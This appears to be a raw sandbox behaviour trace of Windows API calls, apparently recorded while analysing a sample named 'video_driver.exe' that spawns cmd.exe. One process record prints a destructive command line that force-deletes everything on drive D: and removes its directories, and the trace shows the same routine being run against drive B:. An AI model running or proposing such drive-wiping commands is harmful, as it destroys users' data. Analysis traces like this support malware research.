GetProcessHeap () returned 0x590000 [0066.753] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a20f8 [0066.753] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0066.753] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0066.753] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0066.754] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.754] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0066.754] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0066.754] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0066.754] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0066.754] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0066.754] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0066.754] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0066.754] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.754] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0066.754] GetProcessHeap () returned 0x590000 [0066.754] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a2bd0 | out: hHeap=0x590000) returned 1 [0066.754] GetEnvironmentStringsW () returned 0x5a2310* [0066.754] GetProcessHeap () returned 0x590000 [0066.754] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xae2) returned 0x5a4c70 [0066.754] FreeEnvironmentStringsW (penv=0x5a2310) returned 1 [0066.754] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0066.754] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.754] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0066.755] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0066.755] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0066.755] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0066.755] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0066.755] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0066.755] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0066.755] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0066.755] GetProcessHeap () returned 0x590000 [0066.755] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a17c8 [0066.755] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f6e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.755] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x26f6e0, lpFilePart=0x26f6dc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f6dc*="Desktop") returned 0x25 [0066.755] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.755] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f45c | out: lpFindFileData=0x26f45c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5a5760 [0066.755] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0066.756] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26f45c | out: lpFindFileData=0x26f45c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5a5760 [0066.756] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0066.756] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0066.756] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26f45c | out: lpFindFileData=0x26f45c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5a5760 [0066.756] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0066.756] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.756] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0066.756] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0066.756] GetProcessHeap () returned 0x590000 [0066.756] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4c70 | out: hHeap=0x590000) returned 1 [0066.756] GetEnvironmentStringsW () returned 0x5a4180* [0066.756] GetProcessHeap () returned 0x590000 [0066.756] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a5fa0 [0066.757] FreeEnvironmentStringsW (penv=0x5a4180) returned 1 [0066.757] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.757] GetProcessHeap () returned 0x590000 [0066.757] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a17c8 | out: hHeap=0x590000) returned 1 [0066.757] GetProcessHeap () returned 0x590000 [0066.757] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400e) returned 0x5a6ae0 [0066.757] GetProcessHeap () returned 0x590000 [0066.757] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa0) returned 0x5a2e50 [0066.757] GetProcessHeap () returned 0x590000 [0066.757] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae0 | out: hHeap=0x590000) returned 1 [0066.757] GetConsoleOutputCP () returned 0x1b5 [0066.758] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.758] GetUserDefaultLCID () returned 0x409 [0066.758] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f820, cchData=128 | out: lpLCData="0") returned 2 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f820, cchData=128 | out: lpLCData="0") returned 2 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f820, cchData=128 | out: lpLCData="1") returned 2 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0066.759] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0066.759] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0066.761] GetProcessHeap () returned 0x590000 [0066.761] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20c) returned 0x5a2ef8 [0066.761] GetConsoleTitleW (in: lpConsoleTitle=0x5a2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0066.761] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.761] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0066.761] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0066.761] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0066.762] GetProcessHeap () returned 0x590000 [0066.762] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5a6ae0 [0066.762] GetProcessHeap () returned 0x590000 [0066.762] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aaaf8 [0066.763] GetProcessHeap () returned 0x590000 [0066.763] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x5a57e0 [0066.763] GetEnvironmentVariableW (in: lpName="p IN (\"A", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.763] _wcsicmp (_String1="p IN (\"A", _String2="CD") returned 13 [0066.763] _wcsicmp (_String1="p IN (\"A", _String2="ERRORLEVEL") returned 11 [0066.763] _wcsicmp (_String1="p IN (\"A", _String2="CMDEXTVERSION") returned 13 [0066.763] _wcsicmp (_String1="p IN (\"A", _String2="CMDCMDLINE") returned 13 [0066.763] _wcsicmp (_String1="p IN (\"A", _String2="DATE") returned 12 [0066.763] _wcsicmp (_String1="p IN (\"A", _String2="TIME") returned -4 [0066.763] _wcsicmp (_String1="p IN (\"A", _String2="RANDOM") returned -2 [0066.763] _wcsicmp (_String1="p IN (\"A", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.763] GetProcessHeap () returned 0x590000 [0066.763] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a57e0 | out: hHeap=0x590000) returned 1 [0066.763] GetProcessHeap () returned 0x590000 [0066.763] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aaaf8 | out: hHeap=0x590000) returned 1 [0066.764] GetProcessHeap () returned 0x590000 [0066.764] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aaaf8 [0066.764] GetProcessHeap () returned 0x590000 [0066.764] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aaaf8 | out: hHeap=0x590000) returned 1 [0066.764] GetProcessHeap () returned 0x590000 [0066.764] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae0 | out: hHeap=0x590000) returned 1 [0066.764] _wcsicmp (_String1="if", _String2=")") returned 64 [0066.764] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0066.764] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0066.764] _wcsicmp (_String1="IF", _String2="if") returned 0 [0066.764] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0066.764] GetProcessHeap () returned 0x590000 [0066.764] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3110 [0066.764] GetProcessHeap () returned 0x590000 [0066.764] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x59ffc0 [0066.765] GetProcessHeap () returned 0x590000 [0066.765] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x20) returned 0x5a57e0 [0066.765] GetProcessHeap () returned 0x590000 [0066.765] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a57e0, Size=0x16) returned 0x5a1800 [0066.766] GetProcessHeap () returned 0x590000 [0066.766] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a1800) returned 0x16 [0066.766] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0066.766] GetProcessHeap () returned 0x590000 [0066.766] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3170 [0066.766] GetProcessHeap () returned 0x590000 [0066.766] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a31d0 [0066.766] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0066.766] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0066.767] GetProcessHeap () returned 0x590000 [0066.767] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a31f0 [0066.767] GetProcessHeap () returned 0x590000 [0066.767] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1c) returned 0x5a57e0 [0066.767] GetProcessHeap () returned 0x590000 [0066.767] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a57e0, Size=0x14) returned 0x5a3210 [0066.767] GetProcessHeap () returned 0x590000 [0066.767] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a3210) returned 0x14 [0066.768] _wcsicmp (_String1="del", _String2=")") returned 59 [0066.768] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0066.768] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0066.768] _wcsicmp (_String1="IF", _String2="del") returned 5 [0066.768] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0066.768] _wcsicmp (_String1="REM", _String2="del") returned 14 [0066.768] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0066.768] GetProcessHeap () returned 0x590000 [0066.768] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3230 [0066.768] GetProcessHeap () returned 0x590000 [0066.768] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x59ffd8 [0066.768] GetProcessHeap () returned 0x590000 [0066.768] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x28) returned 0x5a3290 [0066.769] GetProcessHeap () returned 0x590000 [0066.769] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a32c0 [0066.770] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0066.770] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0066.770] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0066.770] GetProcessHeap () returned 0x590000 [0066.770] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3320 [0066.770] GetProcessHeap () returned 0x590000 [0066.770] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x44) returned 0x5a3380 [0066.770] GetProcessHeap () returned 0x590000 [0066.770] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a33d0 [0066.771] GetProcessHeap () returned 0x590000 [0066.771] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a33d0, Size=0x12) returned 0x5a33d0 [0066.771] GetProcessHeap () returned 0x590000 [0066.771] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a33d0) returned 0x12 [0066.771] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0066.771] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0066.771] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0066.771] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0066.771] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0066.771] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0066.772] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0066.772] GetProcessHeap () returned 0x590000 [0066.772] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a33f0 [0066.772] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0066.773] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0066.773] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0066.773] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0066.773] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0066.773] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0066.773] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0066.773] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0066.773] GetProcessHeap () returned 0x590000 [0066.773] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3410 [0066.773] GetProcessHeap () returned 0x590000 [0066.773] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a3470 [0066.774] GetProcessHeap () returned 0x590000 [0066.774] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x20) returned 0x5a57e0 [0066.775] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0066.777] GetFullPathNameW (in: lpFileName="B:", nBufferLength=0x208, lpBuffer=0x26f510, lpFilePart=0x26f2bc | out: lpBuffer="B:\\", lpFilePart=0x26f2bc*=0x0) returned 0x3 [0066.778] wcsncmp (_String1="B:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -26 [0066.783] GetFileAttributesW (lpFileName="B:\\" (normalized: "b:")) returned 0xffffffff [0066.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.783] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.783] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.783] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.783] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.784] SetConsoleInputExeNameW () returned 0x1 [0066.784] GetConsoleOutputCP () returned 0x1b5 [0066.784] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.784] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.784] exit (_Code=0) Process: id = "49" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41254000" os_pid = "0xb98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"D:\" del /f /s /q \"D:\" & FOR /D %p IN (\"D:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 77 os_tid = 0x344 [0066.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39ff54 | out: lpSystemTimeAsFileTime=0x39ff54*(dwLowDateTime=0x5ae47e0, dwHighDateTime=0x1d62400)) [0066.889] GetCurrentProcessId () returned 0xb98 [0066.889] GetCurrentThreadId () returned 0x344 [0066.889] GetTickCount () returned 0x1148269 [0066.889] QueryPerformanceCounter (in: lpPerformanceCount=0x39ff4c | out: lpPerformanceCount=0x39ff4c*=18702223723) returned 1 [0066.891] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0066.891] __set_app_type (_Type=0x1) [0066.891] __p__fmode () returned 0x770331f4 [0066.891] __p__commode () returned 0x770331fc [0066.891] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0066.891] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0066.892] GetCurrentThreadId () returned 0x344 [0066.892] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x344) returned 0x60 [0066.892] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.892] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0066.892] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.893] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0066.893] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x39fee4 | out: phkResult=0x39fee4*=0x0) returned 0x2 [0066.893] VirtualQuery (in: lpAddress=0x39ff1b, lpBuffer=0x39feb4, dwLength=0x1c | out: lpBuffer=0x39feb4*(BaseAddress=0x39f000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.893] VirtualQuery (in: lpAddress=0x2a0000, lpBuffer=0x39feb4, dwLength=0x1c | out: lpBuffer=0x39feb4*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0066.893] VirtualQuery (in: lpAddress=0x2a1000, lpBuffer=0x39feb4, dwLength=0x1c | out: lpBuffer=0x39feb4*(BaseAddress=0x2a1000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0066.893] VirtualQuery (in: lpAddress=0x2a3000, lpBuffer=0x39feb4, dwLength=0x1c | out: lpBuffer=0x39feb4*(BaseAddress=0x2a3000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.893] VirtualQuery (in: lpAddress=0x3a0000, lpBuffer=0x39feb4, dwLength=0x1c | out: lpBuffer=0x39feb4*(BaseAddress=0x3a0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0066.893] GetConsoleOutputCP () returned 0x1b5 [0066.893] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.894] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0066.894] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.894] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0066.894] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.894] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.894] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.895] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.895] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.895] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.895] GetEnvironmentStringsW () returned 0x4020f8* [0066.895] GetProcessHeap () returned 0x3f0000 [0066.895] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xaca) returned 0x402bd0 [0066.896] FreeEnvironmentStringsW (penv=0x4020f8) returned 1 [0066.896] GetProcessHeap () returned 0x3f0000 [0066.896] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x4) returned 0x401898 [0066.896] GetEnvironmentStringsW () returned 0x4020f8* [0066.896] GetProcessHeap () returned 0x3f0000 [0066.896] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xaca) returned 0x4036a8 [0066.896] FreeEnvironmentStringsW (penv=0x4020f8) returned 1 [0066.896] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39ee54 | out: phkResult=0x39ee54*=0x68) returned 0x0 [0066.897] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x0, lpData=0x39ee60*=0x0, lpcbData=0x39ee58*=0x1000) returned 0x2 [0066.897] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x4, lpData=0x39ee60*=0x1, lpcbData=0x39ee58*=0x4) returned 0x0 [0066.897] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x0, lpData=0x39ee60*=0x1, lpcbData=0x39ee58*=0x1000) returned 0x2 [0066.897] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x4, lpData=0x39ee60*=0x0, lpcbData=0x39ee58*=0x4) returned 0x0 [0066.897] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x4, lpData=0x39ee60*=0x40, lpcbData=0x39ee58*=0x4) returned 0x0 [0066.897] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x4, lpData=0x39ee60*=0x40, lpcbData=0x39ee58*=0x4) returned 0x0 [0066.897] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39ee5c, lpData=0x39ee60, lpcbData=0x39ee58*=0x1000 | out: lpType=0x39ee5c*=0x0, lpData=0x39ee60*=0x40, lpcbData=0x39ee58*=0x1000) returned 0x2 [0066.897] RegCloseKey (hKey=0x68) returned 0x0 [0066.897] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39ee54 | out: phkResult=0x39ee54*=0x68) returned 0x0 [0066.897] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, 